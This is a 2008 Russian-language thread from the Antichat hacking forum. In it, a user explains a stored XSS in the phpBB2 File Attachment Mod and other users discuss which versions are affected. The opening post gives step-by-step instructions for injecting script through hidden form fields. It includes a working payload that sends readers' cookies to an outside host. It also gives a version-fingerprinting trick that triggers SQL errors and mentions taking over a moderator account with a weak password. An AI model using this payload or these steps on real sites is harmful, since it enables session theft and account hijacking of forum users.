Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
!!! phpBB2 mod File Attachment Mode новая активная XSS !!! |

16.04.2008, 22:05
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме: 905389
Репутация:
332
|
|
!!! phpBB2 mod File Attachment Mode новая активная XSS !!!
Приношу свои извинения но как выяснилось эта уязвимость не в движке форума а только в его модуле File Attachment Mode версия ниже 2.4.5
привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 ))))
исходя из сообщения Basurman :
Сообщение от Basurman
2.0.21 или 2.0.22?Как отличить последнюю версию второй ветки (2.0.22) от остальных? (пост восстановлен)
Очень просто. До последней версии был баг (не инъект!) в лимите во всех скритах, где присутствовал постраничный вывод на экран.
Например, в скрипте viewforum.php, который и рассмотрим.
Определить можно, добавив параметр start=-1 в адресной строке, например, к viewforum.php
То есть, если есть ccылка вида:
http://forum/viewforum.php?f=32
Набираем:
http://forum/viewforum.php?f=32&start=-1
Если вываливается с ошибкой - версия <=2.0.21
Если нет - 2.0.22
Код:
Could not obtain topic information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 12
SELECT t.*, u.username, u.user_id, u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username AS post_username2, p2.post_time FROM topics t, users u, posts p, posts p2, users u2 WHERE t.forum_id = 50 AND t.topic_poster = u.user_id AND p.post_id = t.topic_first_post_id AND p2.post_id = t.topic_last_post_id AND u2.user_id = p2.poster_id AND t.topic_type <> 2 AND t.topic_type <> 3 ORDER BY t.topic_type DESC, t.topic_last_post_id DESC LIMIT -1, 20
Line : 420
File : /xxx/phpbb/viewforum.php
P.S. Все файлы, где есть параметр start можно найти в апдейтере 2.0.22
P.S.S На forums.overclockers.ru стоит не 2.0.22 (ну или сильно криворукий обновляльщик) 
рассмотренная мной версия >= 2.0.22
уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже))
Уязвимые поля:- attachment_list[]
- filename_list[]
- filesize_list[]
- filetime_list[]
- attach_id_list[] Вызывает ошибку при вводе не числового символа, выводящую sql запрос (не разбирал)
суть уязвимости:
при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения
не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором
отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр
type у указанных выше полей на text, и изменяем и изменяем action формы на полный
путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере.
видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в
зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie  )
все тоже самое с перечисленными выше скриптами...
на 3-й ветке пробовал там уже нету.....
Video: http://xakep-ru.pochta.ru/phpBB_xss_by_KIR_PRO.rar1644 Кб  +
если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему 
___________________________________
не могу найти где подпись делать.... может я ударился головой? напишите если кто знает как подпись делать...
Последний раз редактировалось KIR@PRO; 16.06.2008 в 20:28..
|
|
|

16.04.2008, 22:15
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме: 5636868
Репутация:
849
|
|
Ммм... Ты думаешь, жертва сама сохранит страницу и исправит сурс, потом зайдет обратно на форум, чтобы сама себе alert'ы писать типа "ПРЕВЕД"?
|
|
|

16.04.2008, 22:21
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме: 905389
Репутация:
332
|
|
Basurman яж написал АКТИВНАЯ XSS жертве ниче делать не надо....
ты редактируешь страницу... вписываешь в скрытые поля xss и отправляешь... у всех кто читает тему будет выполнятся код....
Последний раз редактировалось KIR@PRO; 16.04.2008 в 22:43..
|
|
|

16.04.2008, 22:57
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме: 5636868
Репутация:
849
|
|
Это вопрос был
И еще:
В phpBB по умолчанию кидать на форум файлы нельзя. Это делается отдельным модом.
Судя по видео - File Attachment Mode... Какая там версия стоит? Последняя 2.4.5
Последний раз редактировалось Basurman; 16.04.2008 в 23:03..
|
|
|

16.04.2008, 23:05
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме: 905389
Репутация:
332
|
|
Basurman честно скажу не знаю.... админы постарались как можно сильнее всю инфу о версиях спрятать...
а ты умерен что это мод File Attachment Mode и что это вообще мод я просто с phpBB вообще впервые столкнулся подруку попался.... у нас в локалке такой на сервере стоит.... и оказалось что у одного из модеров пароль такойже как ник)))))
|
|
|

16.04.2008, 23:10
|
|
Познающий
Регистрация: 08.03.2007
Сообщений: 65
Провел на форуме: 91259
Репутация:
16
|
|
ни о чем не говорит? 
Последний раз редактировалось hackconnect; 16.04.2008 в 23:24..
|
|
|

16.04.2008, 23:10
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме: 5636868
Репутация:
849
|
|
на 2.4.5 не пашет
код посмотрю еще...
http://www.securitylab.ru/vulnerability/273545.php
Последний раз редактировалось Basurman; 16.04.2008 в 23:17..
|
|
|

17.04.2008, 00:27
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме: 905389
Репутация:
332
|
|
тогда будем считать что я нашел как юзать указанную в http://www.securitylab.ru/vulnerability/273545.php уязвимость )))))))) т.к. там не указано в каких параметрах и как юзать))))
bobob а ты к примеру знал как её юзать??? тока честно..... я вот ни где не нашел....
|
|
|

22.04.2008, 14:48
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме: 1347723
Репутация:
1477
|
|
Видео к уязвимости: http://video.antichat.ru/file264.html
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|

22.04.2008, 15:06
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме: 19975136
Репутация:
4536
|
|
ShadOS, http://www.securitylab.ru/vulnerability/273545.php
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|